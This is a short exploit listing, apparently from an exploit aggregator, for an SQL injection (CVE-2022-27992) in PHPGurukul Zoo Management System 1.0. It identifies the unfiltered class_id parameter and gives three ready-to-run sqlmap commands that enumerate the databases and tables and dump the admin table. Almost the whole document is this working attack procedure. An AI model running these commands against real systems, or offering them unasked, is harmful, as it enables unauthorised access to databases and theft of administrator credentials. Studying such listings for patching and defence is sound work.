Exploit for PHPGurukul Zoo Management System 1.0 SQL Injection Vulnerability CVE-2022-27992

Name: Exploit for PHPGurukul Zoo Management System 1.0 SQL Injection Vulnerability CVE-2022-27992
Rating: 5 (346 reviews)

2022-04-08 | CVSS 6.5

## https://sploitus.com/exploit?id=1337DAY-ID-37612
# Zoo Management System SQL Injection
# Author: D4rkP0w4r 
* Description => sql injection at /animals?class_id=1
* Injection Point

http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1

# Exploit 
* Exploit with Sqlmap
python3 sqlmap.py -u http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1 -dbs

python3 sqlmap.py -u http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1 -tables -D zoomanagement

python3 sqlmap.py -u http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1 -columns -D zoomanagement -T admin -dump

# Vulnerable Code

* No filter `class_id`  when inserting data to database